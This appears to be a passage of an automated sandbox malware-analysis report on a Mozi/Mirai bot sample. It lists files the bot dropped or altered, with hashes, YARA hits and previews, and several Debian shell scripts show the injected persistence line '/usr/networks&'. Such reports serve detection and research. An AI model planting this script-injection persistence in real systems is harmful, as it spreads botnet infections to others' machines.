                                                                                                        SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                        Malicious:true
                                                                                                        Yara Hits:
                                                                                                        • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                        Antivirus:
                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                        • Antivirus: ReversingLabs, Detection: 69%
                                                                                                        Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                        /usr/sbin/alsa-info.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text, with very long lines
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25983
                                                                                                        Entropy (8bit):5.455683610707543
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                        MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                        SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                        SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                        SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                        /usr/share/alsa-base/alsa-info.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text, with very long lines
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25464
                                                                                                        Entropy (8bit):5.453877096685684
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                        MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                        SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                        SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                        SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                        /usr/share/alsa/utils.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4725
                                                                                                        Entropy (8bit):5.44928341819888
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                        MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                        SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                        SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                        SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                        /usr/share/brltty/initramfs/brltty.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):46
                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/cups-braille.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:UTF-8 Unicode text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3551
                                                                                                        Entropy (8bit):5.478748088887141
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                        MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                        SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                        SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                        SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                        /usr/share/cups/braille/index.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):590
                                                                                                        Entropy (8bit):5.080350031939274
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                        MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                        SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                        SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                        SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/indexv3.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):945
                                                                                                        Entropy (8bit):4.9071581716168575
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                        MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                        SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                        SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                        SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                        /usr/share/cups/braille/indexv4.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):818
                                                                                                        Entropy (8bit):4.8178661177968065
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                        MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                        SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                        SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                        SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                        /usr/share/debconf/confmodule.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/acpid/examples/ac.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/acpid/examples/default.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):309
                                                                                                        Entropy (8bit):4.972882784760757
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                        MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                        SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                        SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                        SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3647
                                                                                                        Entropy (8bit):4.544491450799858
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                        MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                        SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                        SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                        SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                        /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:awk or perl script, ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1829
                                                                                                        Entropy (8bit):4.38604786798686
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                        MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                        SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                        SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                        SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                        /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):253
                                                                                                        Entropy (8bit):5.267626424494032
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                        MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                        SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                        SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                        SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                                                                        /usr/share/doc/gdb/contrib/gdb-add-index.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1048
                                                                                                        Entropy (8bit):4.806462537404251
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:yJI5VNyJmc20JsvodjbGCHiVwZvFfg0udaATYdITFvVg47VZ0ou:II63pJftBudaqYmTFmJ
                                                                                                        MD5:5864556D6334995F87B9236F2BDDAE2F
                                                                                                        SHA1:65C2E90583C5B2DF8050063559E7FA2885F7427F
                                                                                                        SHA-256:4BBE42BA86B2EBBC463E505A6D3551775BB4E2ED64BDA2C8F1E7B50B9F4C99C3
                                                                                                        SHA-512:0E99B5F846FE6295B4ACFF8030BCBE895D1BCCCDF7B0098E8DABF8ADC50E56CA8A38A549B5A052C86FF9DA9B0A2C7BFBAD7CE939F373AB78F525FEEF2065D615
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir=".".index="${file}.gdb-index"..rm -f $index.# Ensure intermediate index file is removed when we exit..trap "rm -f $index" 0..$GDB --batch -nx -iex 'set auto-load no' \. -ex "file $file" -ex "save gdb-index $dir" || {. # Just in case.. status=$?. echo "$myname: gdb error generating index for $file" 1>&2. exit $status.}..# In some situations gdb can exit without creating an index. This is.# not an error..# E.g., if $file is stripped. This behaviour is akin to stripping an.# already stripped binary, it's a no-op..status=0..if test -f "$index"; then. $OBJCOPY --add-section .gdb_index="$index" \..--set-section-flags .gdb_index=readonly "$file" "$file". status=$?.else. echo "$myname: No index was created for $file" 1>&2. echo "$myname: [Was there no debuginfo? Was there already an index?
                                                                                                        /usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
